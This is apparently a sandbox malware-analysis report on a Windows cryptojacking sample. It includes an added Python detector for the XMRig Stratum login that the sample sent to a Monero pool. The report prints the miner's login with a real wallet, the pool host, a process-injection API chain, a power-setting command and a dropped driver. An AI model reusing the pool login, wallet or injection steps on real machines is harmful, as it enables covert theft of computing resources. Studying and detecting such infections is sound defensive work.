Source: global traffic; TCP traffic: 192.168.2.5:49704 -> 141.94.96.71:80 payload; data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 4d 33 39 44 4d 31 44 51 6a 46 4b 55 6e 54 33 74 32 4b 69 48 4e 55 36 71 51 6a 6d 52 46 37 39 4a 33 31 66 53 62 74 42 4e 61 66 55 58 39 42 32 67 41 77 79 73 6a 4c 46 41 44 51 35 6d 68 71 52 34 4d 36 43 38 4a 4a 52 46 58 77 4c 50 78 44 48 61 70 75 43 72 48 45 33 6d 52 42 6a 54 77 22 2c 22 70 61 73 73 22 3a 22 55 6c 74 69 6d 61 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 67 70 75 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 70 61 6e 74 68 65 72 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a
data ascii (decoded from the hex above with case preserved; the wallet address is base58 and case-sensitive):
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw","pass":"Ultima","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
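The payload above is the first message of the Stratum JSON-RPC exchange XMRig uses: the wallet goes in login, the pool password in pass (here the worker label Ultima), agent gives the exact miner build, and algo lists what that build can hash (rx/0 is RandomX, the current Monero algorithm). It went to pool.supportxmr.com on TCP port 80, so blocking the usual pool ports (3333, 5555, 7777) would not have caught it; content inspection does. The Python below is an added example and not part of the report: it converts the report's hex dump to bytes, parses the login with the case restored from the hex (the report's own ASCII rendering is lower-cased, which mangles the base58 wallet), and derives the share difficulty from a pool reply that is constructed here, since the report does not show the pool's answer. The target-to-difficulty conversion is the compact little-endian target convention used by Monero stratum pools (difficulty is roughly 0xFFFFFFFF divided by a 4-byte target).

```python
"""Decode and flag the XMRig Stratum login captured above.

Added example, not part of the Joe Sandbox report. LOGIN_PAYLOAD is the ASCII
decode of the hex bytes the report captured on 192.168.2.5:49704 -> 141.94.96.71:80,
with the case taken from the hex. POOL_REPLY is constructed for illustration;
the report does not show the pool's answer.
"""
import json
import re

LOGIN_PAYLOAD = (
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":'
    b'"46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw",'
    b'"pass":"Ultima","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid":"",'
    b'"algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx",'
    b'"cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1",'
    b'"rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2",'
    b'"argon2/ninja","ghostrider"]}}\n'
)

# Constructed pool answer (not from the report): session id, blob and seed_hash are
# dummies; "b88d0600" is a 4-byte little-endian compact target.
POOL_REPLY = (
    b'{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"0123456789abcdef","status":"OK",'
    b'"job":{"blob":"00","job_id":"1","target":"b88d0600","algo":"rx/0","height":0,"seed_hash":"00"}}}\n'
)

BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def from_hex_dump(dump: str) -> bytes:
    """Convert the report's 'data raw: 7b 22 69 ...' listing into bytes."""
    return bytes.fromhex(dump)  # whitespace between byte pairs is ignored


def is_monero_address(addr: str) -> bool:
    """Standard (4...) or subaddress (8...) Monero mainnet address: 95 base58 chars."""
    return len(addr) == 95 and addr[0] in "48" and all(c in BASE58 for c in addr)


def _jsonrpc(payload: bytes):
    """Parse one JSON-RPC 2.0 line, or None if the bytes are not that."""
    try:
        msg = json.loads(payload.decode("ascii"))
    except ValueError:  # UnicodeDecodeError and JSONDecodeError both derive from it
        return None
    return msg if isinstance(msg, dict) and msg.get("jsonrpc") == "2.0" else None


def parse_stratum_login(payload: bytes):
    """Fields a responder wants from a miner 'login' request, or None if not one."""
    msg = _jsonrpc(payload)
    if not msg or msg.get("method") != "login":
        return None
    p = msg.get("params") or {}
    wallet = p.get("login", "")
    m = re.match(r"(?P<miner>[A-Za-z]+)/(?P<ver>\d+(?:\.\d+)*)", p.get("agent", ""))
    algos = p.get("algo") or []
    return {
        "wallet": wallet,
        "wallet_is_monero": is_monero_address(wallet),
        "worker_password": p.get("pass", ""),
        "miner": m.group("miner") if m else None,
        "version": m.group("ver") if m else None,
        "algos": algos,
        "uses_randomx": "rx/0" in algos,
    }


def looks_like_stratum_login(payload: bytes) -> bool:
    """Content-based check that works on any port, including the TCP/80 seen here."""
    return parse_stratum_login(payload) is not None


def parse_pool_reply(payload: bytes):
    """Extract the first job and turn its compact target into a share difficulty."""
    msg = _jsonrpc(payload)
    if not msg or not isinstance(msg.get("result"), dict):
        return None
    job = msg["result"].get("job") or {}
    target = job.get("target", "")
    difficulty = None
    if len(target) == 8:    # 4-byte target
        difficulty = 0xFFFFFFFF // int.from_bytes(bytes.fromhex(target), "little")
    elif len(target) == 16:  # 8-byte target
        difficulty = 0xFFFFFFFFFFFFFFFF // int.from_bytes(bytes.fromhex(target), "little")
    return {"session": msg["result"].get("id"), "job_id": job.get("job_id"),
            "algo": job.get("algo"), "difficulty": difficulty}


if __name__ == "__main__":
    info = parse_stratum_login(LOGIN_PAYLOAD)
    print(f"{info['miner']} {info['version']} -> wallet {info['wallet'][:12]}... "
          f"({len(info['algos'])} algorithms, RandomX={info['uses_randomx']})")
    print("share difficulty:", parse_pool_reply(POOL_REPLY)["difficulty"])
```

The wallet is the one indicator in this exchange the operator cannot rotate cheaply, so it is the value to pivot on across samples; the pool hostname and port change far more often.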
Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: dialer.exe; String found in binary or memory: cryptonight-monerov7
Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: nW2oopMIdg.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb; source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe; Code function: 31_2_000001E85898DCE0 FindFirstFileExW, 31_2_000001E85898DCE0
Source: C:\Windows\System32\lsass.exe; Code function: 39_2_00000140AE86DCE0 FindFirstFileExW, 39_2_00000140AE86DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 40_2_00000195DD5CDCE0 FindFirstFileExW, 40_2_00000195DD5CDCE0
Source: C:\Windows\System32\dwm.exe; Code function: 41_2_000001160CA4DCE0 FindFirstFileExW, 41_2_000001160CA4DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 66_2_00000257E10ADCE0 FindFirstFileExW, 66_2_00000257E10ADCE0
Source: C:\Windows\System32\svchost.exe; Code function: 67_2_000001F28C93DCE0 FindFirstFileExW, 67_2_000001F28C93DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 68_2_000001CA9854DCE0 FindFirstFileExW, 68_2_000001CA9854DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 69_2_000001D26531DCE0 FindFirstFileExW, 69_2_000001D26531DCE0
Source: global traffic; TCP traffic: 192.168.2.5:57360 -> 1.1.1.1:53
Source: global traffic; TCP traffic: 192.168.2.5:53943 -> 162.159.36.2:53
Source: Joe Sandbox View; IP Address: 141.94.96.71
Source: Joe Sandbox View; ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
Source: Network traffic; Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:63299 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.71:80
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: pool.supportxmr.com
Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286173867.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://3csp.icrosof4m/ocp0
Source: lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRoot
Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 4508, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Code function: 0_2_00007FF7EB901394 NtSetSystemPowerState
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Code function: 36_2_00007FF7B1C81394 NtOpenKeyTransacted
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW
          Source: C:\Windows\System32\lsass.exe | Code function: 39_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CA428C8 NtEnumerateValueKey,NtEnumerateValueKey
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
          Source: C:\Windows\System32\dialer.exe | Code function: 64_2_0000000140001394 NtQueryInformationProcess
          Source: C:\ProgramData\Screenshots\Lightshot.exe | File created: C:\Windows\TEMP\yycjbdwxjaoe.sys
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_bzsopdsf.pqc.ps1
